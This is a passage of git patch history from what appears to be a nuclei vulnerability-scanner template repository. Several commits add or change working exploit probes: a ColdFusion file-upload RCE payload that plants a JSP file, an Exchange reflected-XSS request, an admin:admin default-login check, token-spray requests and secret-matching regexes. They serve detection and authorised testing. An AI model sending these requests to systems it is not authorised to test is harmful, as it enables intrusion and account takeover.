1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 8debd1d9e8..15dd4b5ea2 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -4,7 +4,10 @@ info: name: CVE-2018-15961 author: SkyLark-Lab,ImNightmaree severity: critical - tags: server,cve,cve2018,rce,coldfusion,fileupload + reference: + - https://github.com/vah13/CVE-2018-15961 + - https://www.cvedetails.com/cve/CVE-2018-15961/ + tags: adobe,cve,cve2018,rce,coldfusion,fileupload requests: - raw: @@ -14,15 +17,16 @@ requests: Content-Type: multipart/form-data; boundary=---------------------------24464570528145 -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg - %%%%%%%% + <%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%> -----------------------------24464570528145 Content-Disposition: form-data; name="path" - {{randstr}} + {{randstr}}.jsp -----------------------------24464570528145-- + - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" @@ -31,8 +35,10 @@ requests: matchers: - type: word + part: body words: - - "{{randstr}}" + - "18188751" + - type: status status: - 200 From c0d875c623492c26ed944582c6b5bbdcabec5185 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 11 Nov 2021 14:32:24 +0530 Subject: [PATCH 3551/4083] Update CVE-2021-42237.yaml --- cves/2021/CVE-2021-42237.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/cves/2021/CVE-2021-42237.yaml b/cves/2021/CVE-2021-42237.yaml index e83429648a..34c06043d1 100644 --- a/cves/2021/CVE-2021-42237.yaml +++ b/cves/2021/CVE-2021-42237.yaml @@ -24,11 +24,6 @@ info: cve-id: CVE-2021-42237 cwe-id: CWE-502 tags: rce,sitecore,deserialization,oast - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-42237 - cwe-id: CWE-502 requests: - raw: From ca0b7890dc31ff3f0c63fe310a1c5c54ccca7733 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 14:35:58 +0530 Subject: [PATCH 3552/4083] misc update --- cves/2021/CVE-2021-31602.yaml | 2 +- technologies/fingerprinthub-web-fingerprints.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-31602.yaml b/cves/2021/CVE-2021-31602.yaml index 60c3b4806c..d4e579b196 100644 --- a/cves/2021/CVE-2021-31602.yaml +++ b/cves/2021/CVE-2021-31602.yaml @@ -4,7 +4,7 @@ info: name: Pentaho <= 9.1 Authentication Bypass of Spring APIs author: pussycat0x severity: high - description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials" + description: An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials. reference: - https://seclists.org/fulldisclosure/2021/Nov/13 - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index 5c947d8fa6..6c06b2c7d4 100644 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -4437,7 +4437,7 @@ requests: part: header name: glassfish words: - - "Server: GlassFish Server Open Source Edition" + - "GlassFish Server Open Source Edition" - type: word name: globalsign-cert From 6d33f919b4ccd5f9398aaa3fe6293fb689162a16 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 14:47:10 +0530 Subject: [PATCH 3553/4083] misc update (wip) --- token-spray/api-stytch.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/token-spray/api-stytch.yaml b/token-spray/api-stytch.yaml index bab2000791..d2fc8c251b 100644 --- a/token-spray/api-stytch.yaml +++ b/token-spray/api-stytch.yaml @@ -12,15 +12,15 @@ info: self-contained: true requests: - raw: - - | - POST https://test.stytch.com/v1/users HTTP/1.1 - Authorization: Basic {{base64(PROJECT {{ID}} + ':' + {{SECRET}})}} - Host: test.stytch.com - Content-Type: application/json - Content-Length: 28 + - | + POST https://test.stytch.com/v1/users HTTP/1.1 + Authorization: Basic {{base64(PROJECT_ID + ':' + SECRET)}} + Host: test.stytch.com + Content-Type: application/json - {"email": "test@stytch.com"} + {"email": "test@stytch.com"} + attack: pitchfork matchers: - type: word part: body @@ -28,4 +28,4 @@ requests: - '"status_code":' - '"request_id":' - '"user_id":' - condition: and + condition: and \ No newline at end of file From 33a733d4f63f90a722cf3b0ef69de12bdacf977e Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 15:05:31 +0530 Subject: [PATCH 3554/4083] misc updates --- cves/2018/CVE-2018-15961.yaml | 36 +++++++++++++++++++++++++---------- 1 file changed, 26 insertions(+), 10 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 15dd4b5ea2..3055bdfd6f 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -1,13 +1,14 @@ id: CVE-2018-15961 info: - name: CVE-2018-15961 + name: Adobe ColdFusion Unrestricted file upload RCE author: SkyLark-Lab,ImNightmaree severity: critical + description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. reference: - - https://github.com/vah13/CVE-2018-15961 - - https://www.cvedetails.com/cve/CVE-2018-15961/ - tags: adobe,cve,cve2018,rce,coldfusion,fileupload + - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 + - https://github.com/xbufu/CVE-2018-15961 + tags: cve,cve2018,adobe,rce,coldfusion,fileupload requests: - raw: @@ -20,24 +21,39 @@ requests: Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg - <%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%> + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2018-15961"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i -----------------------------24464570528145 Content-Disposition: form-data; name="path" {{randstr}}.jsp -----------------------------24464570528145-- - - method: GET - path: - - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" + - | + GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - type: word - part: body words: - - "18188751" + - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - type: status status: From f47fca558a468053c008a185a20696c98548d9ce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Nov 2021 11:06:36 +0000 Subject: [PATCH 3555/4083] Auto Generated CVE annotations [Thu Nov 11 11:06:36 UTC 2021] :robot: --- cves/2018/CVE-2018-15961.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 3055bdfd6f..6e393a310c 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - https://github.com/xbufu/CVE-2018-15961 tags: cve,cve2018,adobe,rce,coldfusion,fileupload + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-15961 + cwe-id: CWE-434 requests: - raw: From a13724bb1aaadafcdbcf54658f4dec5678ae2398 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 17:22:47 +0530 Subject: [PATCH 3556/4083] misc update --- token-spray/api-stytch.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/token-spray/api-stytch.yaml b/token-spray/api-stytch.yaml index d2fc8c251b..d410066fa0 100644 --- a/token-spray/api-stytch.yaml +++ b/token-spray/api-stytch.yaml @@ -14,13 +14,12 @@ requests: - raw: - | POST https://test.stytch.com/v1/users HTTP/1.1 - Authorization: Basic {{base64(PROJECT_ID + ':' + SECRET)}} + Authorization: Basic {{base64(id + ':' + secret)}} Host: test.stytch.com Content-Type: application/json {"email": "test@stytch.com"} - attack: pitchfork matchers: - type: word part: body From ff1bfd8ed8d92d574e925a22d8945c5d06f75009 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 20:32:39 +0530 Subject: [PATCH 3557/4083] misc update --- token-spray/{square.yaml => api-square.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename token-spray/{square.yaml => api-square.yaml} (100%) diff --git a/token-spray/square.yaml b/token-spray/api-square.yaml similarity index 100% rename from token-spray/square.yaml rename to token-spray/api-square.yaml From 02ad4e81b0c2bcc6711da9f5b806c31bcd9921a3 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 11 Nov 2021 11:13:45 -0500 Subject: [PATCH 3558/4083] Removing misconfiguration/phpmyadmin/phpmyadmin-setup.yaml in favor of miscellaneous/phpmyadmin-setup.yaml --- .../phpmyadmin/phpmyadmin-setup.yaml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 misconfiguration/phpmyadmin/phpmyadmin-setup.yaml diff --git a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml deleted file mode 100644 index 2485003909..0000000000 --- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: phpmyadmin-setup - -info: - name: phpMyAdmin setup page - author: thevillagehacker - severity: medium - tags: phpmyadmin - reference: https://hackerone.com/reports/297339 - -requests: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/setup/index.php" - matchers: - - type: word - words: - - "phpMyAdmin setup" From e43e20880d9218a97c45a1c6069c4d77fb2e5074 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 11 Nov 2021 11:14:21 -0500 Subject: [PATCH 3559/4083] Move miscellaneous/phpmyadmin-setup.yaml to misconfiguration/phpmyadmin/phpmyadmin-setup.yaml --- .../phpmyadmin}/phpmyadmin-setup.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) rename {miscellaneous => misconfiguration/phpmyadmin}/phpmyadmin-setup.yaml (86%) diff --git a/miscellaneous/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml similarity index 86% rename from miscellaneous/phpmyadmin-setup.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 72870b91b5..7ab271dc14 100644 --- a/miscellaneous/phpmyadmin-setup.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -17,6 +17,7 @@ requests: - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" + - "{{BaseURL}}/phpmyadmin/setup/index.php" stop-at-first-match: true matchers-condition: and @@ -24,7 +25,9 @@ requests: - type: word words: - "You want to configure phpMyAdmin using web interface" + - "phpMyAdmin setup" + condition: or - type: status status: - - 200 \ No newline at end of file + - 200 From 7bbb9de4843b71117bc4c423487985a45e4fd5cd Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 11 Nov 2021 11:15:39 -0500 Subject: [PATCH 3560/4083] correct template id name collisions --- file/keys/credential-exposure.yaml | 2 +- file/keys/google-api.yaml | 4 ++-- file/keys/sendgrid-api.yaml | 4 ++-- token-spray/google-placedetails.yaml | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 40b98b7fab..71ed00a1ab 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -1,4 +1,4 @@ -id: credentials-disclosure +id: credentials-disclosure-file # Extract secrets regex like api keys, password, token, etc ... for different services # Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. diff --git a/file/keys/google-api.yaml b/file/keys/google-api.yaml index c227c5263b..8fc2776945 100644 --- a/file/keys/google-api.yaml +++ b/file/keys/google-api.yaml @@ -1,4 +1,4 @@ -id: google-api-key +id: google-api-key-file info: name: Google API key @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - "AIza[0-9A-Za-z\\-_]{35}" \ No newline at end of file + - "AIza[0-9A-Za-z\\-_]{35}" diff --git a/file/keys/sendgrid-api.yaml b/file/keys/sendgrid-api.yaml index cf01b33d17..4b5c0e3c65 100644 --- a/file/keys/sendgrid-api.yaml +++ b/file/keys/sendgrid-api.yaml @@ -1,4 +1,4 @@ -id: sendgrid-api-key +id: sendgrid-api-key-file info: name: Sendgrid API Key @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" \ No newline at end of file + - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml index 2f6cf7d464..b8605b6dde 100644 --- a/token-spray/google-placedetails.yaml +++ b/token-spray/google-placedetails.yaml @@ -1,4 +1,4 @@ -id: api-googlespeedlimit +id: api-google-place-details info: name: Google Place Details API Test From 878a74647ccd8949a3ebbcb78727678560becd5f Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 22:04:45 +0530 Subject: [PATCH 3561/4083] misc updates --- .../{pma-server-import.yaml => phpmyadmin-server-import.yaml} | 0 misconfiguration/phpmyadmin/phpmyadmin-setup.yaml | 4 ++-- misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml | 2 ++ 3 files changed, 4 insertions(+), 2 deletions(-) rename misconfiguration/phpmyadmin/{pma-server-import.yaml => phpmyadmin-server-import.yaml} (100%) diff --git a/misconfiguration/phpmyadmin/pma-server-import.yaml b/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml similarity index 100% rename from misconfiguration/phpmyadmin/pma-server-import.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml diff --git a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 7ab271dc14..383a94ea63 100644 --- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -2,9 +2,9 @@ id: phpmyadmin-setup info: name: Publicly Accessible Phpmyadmin Setup - author: sheikhrishad + author: sheikhrishad,thevillagehacker severity: medium - tags: misc + tags: phpmyadmin,misconfig requests: - method: GET diff --git a/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml index 0bb3cbb91c..fecbccc2c1 100644 --- a/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml @@ -14,6 +14,7 @@ requests: - "{{BaseURL}}/phpmyadmin/index.php?db=information_schema" - "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -21,6 +22,7 @@ requests: - "var db = 'information_schema';" - "var opendb_url = 'db_structure.php';" condition: and + - type: status status: - 200 From 65ce478c0ec4019c4d6169a289cf52fd283a22fb Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 22:59:29 +0530 Subject: [PATCH 3562/4083] misc updates --- cves/2017/CVE-2017-15944.yaml | 4 ++-- cves/2018/CVE-2018-10141.yaml | 8 ++++---- default-logins/paloalto/panos-default-login.yaml | 6 +++--- exposed-panels/globalprotect-panel.yaml | 3 ++- 4 files changed, 11 insertions(+), 10 deletions(-) diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 41f4f5c82f..48553abee3 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -8,11 +8,11 @@ info: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: critical - tags: cve,cve2017,rce,vpn,paloalto,globalprotect classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2017-15944 + tags: cve,cve2017,rce,vpn,panos,globalprotect requests: - raw: @@ -24,9 +24,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "@start@Success@end@" - part: body - type: status status: diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index fe677ff879..577e38e5cb 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml @@ -2,16 +2,16 @@ id: CVE-2018-10141 info: name: GlobalProtect Login page XSS + severity: medium author: dhiyaneshDk description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML. - severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141 - tags: globalprotect,xss,cve,cve2018,vpn classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2018-10141 cwe-id: CWE-79 + tags: cve,cve2018,panos,vpn,globalprotect,xss requests: - method: GET @@ -21,14 +21,14 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - 'var valueUser = "j";-alert(1)-"x";' - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: diff --git a/default-logins/paloalto/panos-default-login.yaml b/default-logins/paloalto/panos-default-login.yaml index f7bac9f620..2e218f2bc2 100644 --- a/default-logins/paloalto/panos-default-login.yaml +++ b/default-logins/paloalto/panos-default-login.yaml @@ -6,7 +6,7 @@ info: severity: high description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. - tags: paloalto,panos,default-login + tags: panos,default-login requests: - raw: @@ -17,19 +17,19 @@ requests: user={{username}}&passwd={{password}}&challengePwd=&ok=Login + attack: pitchfork payloads: username: - admin password: - admin - attack: pitchfork matchers-condition: and matchers: - type: word + part: header words: - "Set-Cookie: PHPSESSID" - part: header - type: word words: diff --git a/exposed-panels/globalprotect-panel.yaml b/exposed-panels/globalprotect-panel.yaml index 6d6a03dfce..2f992eea88 100644 --- a/exposed-panels/globalprotect-panel.yaml +++ b/exposed-panels/globalprotect-panel.yaml @@ -4,7 +4,7 @@ info: name: PaloAlto Networks GlobalProtect Panel author: organiccrap severity: info - tags: panel + tags: panel,panos requests: - method: GET @@ -12,6 +12,7 @@ requests: - "{{BaseURL}}/global-protect/login.esp" - "{{BaseURL}}/sslmgr" + stop-at-first-match: true matchers: - type: word words: From 196470955845ac4f41ba62e55320dd2da0027ae4 Mon Sep 17 00:00:00 2001 From: Pradeepch99 Date: Fri, 12 Nov 2021 11:27:26 +0530 Subject: [PATCH 3563/4083] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index 3c31133fed..ad4e2a97c4 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -145,6 +145,11 @@ requests: status: - 200 + - type: word + words: + - "Content-Type: application/json" + part: header + - type: regex regex: - "__schema" From 69a3ad0afb2125384350ed1ad64db8b5eac76d57 Mon Sep 17 00:00:00 2001 From: Pradeepch99 Date: Fri, 12 Nov 2021 11:39:28 +0530 Subject: [PATCH 3565/4083] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index ad4e2a97c4..b10a5913e2 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -149,7 +149,7 @@ requests: words: - "Content-Type: application/json" part: header - + - type: regex regex: - "__schema" From 7a30c6a982d46b75e4ec17ea8c223c033d1c600e Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 12 Nov 2021 12:55:49 +0530 Subject: [PATCH 3566/4083] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index b10a5913e2..f4c4be2de5 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -146,9 +146,9 @@ requests: - 200 - type: word - words: - - "Content-Type: application/json" part: header + words: + - "application/json" - type: regex regex: From bde5a0dc2fc8835426abd137f9aaac9e4739d928 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 12 Nov 2021 17:30:28 +0530 Subject: [PATCH 3567/4083] Update api-petfinder.yaml --- token-spray/api-petfinder.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/api-petfinder.yaml b/token-spray/api-petfinder.yaml index f4f57001c7..17fd3a85c3 100644 --- a/token-spray/api-petfinder.yaml +++ b/token-spray/api-petfinder.yaml @@ -18,7 +18,7 @@ requests: Content-Type: application/x-www-form-urlencoded Content-Length: 81 - grant_type=client_credentials&client_id={{ID}}&client_secret={{SECRET}} + grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} matchers: - type: word From 981b6787ebcd7bf351c12deaf7c107fd0b4180d2 Mon Sep 17 00:00:00 2001 From: Adam Crosser Date: Fri, 12 Nov 2021 10:59:49 -0600 Subject: [PATCH 3568/4083] Added New Nuclei Templates --- technologies/adfs-detect.yaml | 22 +++++++++++++++++++ technologies/argocd-detect.yaml | 22 +++++++++++++++++++ technologies/graphiql-detect.yaml | 22 +++++++++++++++++++ technologies/hashicorp-vault-detect.yaml | 23 ++++++++++++++++++++ technologies/spinnaker-detect.yaml | 27 ++++++++++++++++++++++++ 5 files changed, 116 insertions(+) create mode 100644 technologies/adfs-detect.yaml create mode 100644 technologies/argocd-detect.yaml create mode 100644 technologies/graphiql-detect.yaml create mode 100644 technologies/hashicorp-vault-detect.yaml create mode 100644 technologies/spinnaker-detect.yaml diff --git a/technologies/adfs-detect.yaml b/technologies/adfs-detect.yaml new file mode 100644 index 0000000000..3b5b458190 --- /dev/null +++ b/technologies/adfs-detect.yaml @@ -0,0 +1,22 @@ +id: adfs-detect + +info: + name: ADFS Detect + author: Adam Crosser + severity: info + description: Detects ADFS with forms-based authentication enabled. + tags: tech,ADFS + +requests: + - method: GET + path: + - "{{BaseURL}}/adfs/ls/idpinitiatedsignon.aspx" + + redirects: false + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '/adfs/portal/css/style.css' + part: body diff --git a/technologies/argocd-detect.yaml b/technologies/argocd-detect.yaml new file mode 100644 index 0000000000..8144202189 --- /dev/null +++ b/technologies/argocd-detect.yaml @@ -0,0 +1,22 @@ +id: argocd-detect + +info: + name: Argo CD Detect + author: Adam Crosser + severity: info + description: Detects the Argo CD website console + tags: tech,ArgoCD + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + redirects: false + stop-at-first-match: false + matchers-condition: and + matchers: + - type: word + words: + - 'Argo CD' + part: body diff --git a/technologies/graphiql-detect.yaml b/technologies/graphiql-detect.yaml new file mode 100644 index 0000000000..fa03944e3a --- /dev/null +++ b/technologies/graphiql-detect.yaml @@ -0,0 +1,22 @@ +id: graphiql-detect + +info: + name: GraphiQL Detect + author: Adam Crosser + severity: info + description: Detects the GraphiQL application + tags: tech,ADFS + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + redirects: false + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + words: + - '<title>GraphiQL' + part: body diff --git a/technologies/hashicorp-vault-detect.yaml b/technologies/hashicorp-vault-detect.yaml new file mode 100644 index 0000000000..2317ed9edb --- /dev/null +++ b/technologies/hashicorp-vault-detect.yaml @@ -0,0 +1,23 @@ +id: hashicorp-vault-detect + +info: + name: HashiCorp Vault Detect + author: Adam Crosser + severity: info + description: Detects HashiCorp Vault + tags: tech,HashiCorp,Vault + +requests: + - method: GET + path: + - "{{BaseURL}}/ui/vault/auth" + + redirects: false + stop-at-first-match: true + matchers-condition: and + + matchers: + - type: word + words: + - '<meta name="vault/config/environment"' + part: body \ No newline at end of file diff --git a/technologies/spinnaker-detect.yaml b/technologies/spinnaker-detect.yaml new file mode 100644 index 0000000000..5f9acf32a4 --- /dev/null +++ b/technologies/spinnaker-detect.yaml @@ -0,0 +1,27 @@ +id: spinnaker-detect + +info: + name: Spinnaker Detect + author: Adam Crosser + severity: info + description: Detects the Spinnaker continuous delivery software + tags: tech,Spinnaker + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + redirects: false + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + words: + - '<spinnaker ng-if="!authenticating"></spinnaker>' + part: body + + - type: word + part: header + words: + - 'X-Spinnaker-Priority' From 29bcd6b821f9e381d4c8c09cf3e08593d68507bc Mon Sep 17 00:00:00 2001 From: rootxharsh <rootxharsh@gmail.com> Date: Fri, 12 Nov 2021 23:55:15 +0530 Subject: [PATCH 3569/4083] Add CVE-2021-41349 --- cves/2021/CVE-2021-41349.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/2021/CVE-2021-41349.yaml diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml new file mode 100644 index 0000000000..d5bde0fdbd --- /dev/null +++ b/cves/2021/CVE-2021-41349.yaml @@ -0,0 +1,20 @@ +id: Exchange XSS + +info: + name: Exchange XSS + author: @rootxharsh, @iamnoooob + severity: medium +requests: + - raw: + - | + POST /autodiscover/autodiscover.json HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + + <HTTPVOID>&x=1 + + matchers: + - type: dsl + dsl: + - 'contains(body, "<HTTPVOID>")' From e649bcc493ce3e8c0a34352111ca09d14f2d15e2 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 00:29:04 +0530 Subject: [PATCH 3570/4083] template fix --- cves/2021/CVE-2021-41349.yaml | 29 ++++++++++++++++++++++------- 1 file changed, 22 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml index d5bde0fdbd..fcc2343cca 100644 --- a/cves/2021/CVE-2021-41349.yaml +++ b/cves/2021/CVE-2021-41349.yaml @@ -1,20 +1,35 @@ -id: Exchange XSS +id: CVE-2021-41349 info: - name: Exchange XSS - author: @rootxharsh, @iamnoooob + name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange + author: rootxharsh,iamnoooob severity: medium + tags: cve,cve2021,xss,microsoft,exchange + reference: + - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41349 + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349 + requests: - raw: - | POST /autodiscover/autodiscover.json HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 <HTTPVOID>&x=1 + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body, "<HTTPVOID>")' + - type: word + words: + - '="<HTTPVOID>' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 500 \ No newline at end of file From d77afde6f22e3dfec52ce62765174ca3609b40d9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 12 Nov 2021 19:00:28 +0000 Subject: [PATCH 3571/4083] Auto Generated CVE annotations [Fri Nov 12 19:00:28 UTC 2021] :robot: --- cves/2021/CVE-2021-41349.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml index fcc2343cca..81a6515656 100644 --- a/cves/2021/CVE-2021-41349.yaml +++ b/cves/2021/CVE-2021-41349.yaml @@ -9,6 +9,11 @@ info: - 